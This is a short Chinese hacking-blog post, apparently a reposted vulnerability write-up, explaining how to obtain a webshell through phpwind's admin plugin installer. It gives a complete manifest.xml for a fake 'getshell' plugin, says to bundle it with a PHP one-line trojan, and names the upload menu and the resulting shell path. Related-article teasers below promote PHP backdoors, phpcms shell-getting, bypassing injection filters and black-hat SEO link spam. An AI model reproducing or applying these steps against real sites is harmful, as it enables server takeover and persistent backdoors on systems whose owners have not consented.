phpwind后台getshell ***

hacker5年前黑客文章1282

在phpwind后台上传插件处,可以上传一个包含php木马的phpwind标准格式插件安装包,并可getshell.

一、先 *** 一个安装包,需要包含一个manifest.xml文件和一个php一句话(此处文件名为php.php)。

manifest.xml代码如下:

<?xml version="1.0" encoding="gbk"?>
<manifest>
<application>
<name>getshell</name>
<alias>getshell</alias>
<version>1.0</version>
<pw-version>1.0</pw-version>
<type>app</type>
<description>getshell
</description>
<charset>gbk</charset>
<website>http://wooyun.org</website>
<author-name>123@wooyun</author-name>
<author-email>root@wooyun.org</author-email>
<author-icon>http://wooyun.org</author-icon>
</application>
    <res>res</res>
</manifest> 

将以上文件打包成zip格式。

 

二、在后台 点击云平台→应用管理→本地安装处上传 *** 好的安装包,并点击安装。

9477714 三、shell为http://127.0.0.1/phpwind/src/extensions/getshell/php.php
标签: 黑客技术

相关文章

Truecrypt是不是适用全部电脑操作系统?

Truecrypt是不是适用全部电脑操作系统?

什么叫Truecrypt? TrueCrypt在2017年五月淘汰以前是一款出色的开源系统磁盘加密系统软件。客户能够 根据键入客户建立的登陆密码语句来对其全部系统文件开展数据加密。它还具备容许客户掩...

PHP后门新玩法:一款猥琐的PHP后门分析

PHP后门新玩法:一款猥琐的PHP后门分析

作者: GENXOR   [转载请注明出处自  :  360网站卫士博客-blog.wangzhan.360.cn] 0x00 背景...

SnoopSnitch安装与使用方法

SnoopSnitch安装与使用方法

SnoopSnitch是一款开源系统Android程序运行,为客户出示检测移动终端及其设备连接的移动互联网安全系数的机遇。 SnoopSnitch运用是一款用于剖析挪动通信网络的挪动防护软件。该运用...

记一次phpcms v9后台拿shell过程

记一次phpcms v9后台拿shell过程

记一次phpcms v9后台拿shell过程 登录进入后台管理后,点击界面,模板风格,然后点击祥细列表,如下图: 然后点击 search 这个文件夹,如下图: 然...

黑帽往事:电影网站作弊提高排名日收入过万

黑帽往事:电影网站作弊提高排名日收入过万

一家黑帽电影网站,通过垃圾站+挂黑链方式,进行黑帽seo,从而提高百度排名,可实现日收入过万。这家黑帽作弊网站,实际是一家名为“碟民网”的电影网站,通过站长工具查询该网站的百度权重,可发现此网站的...

记一次绕过垃圾防注入系统过程

记一次绕过垃圾防注入系统过程

今天无聊在帮一个站做渗透测试的时候,旁注找到一个asp企业站,asp好站拿点嘛,所以还是非常开心的,其中一个asp站,有这样的链接: http://www.xxx.cn/news_list....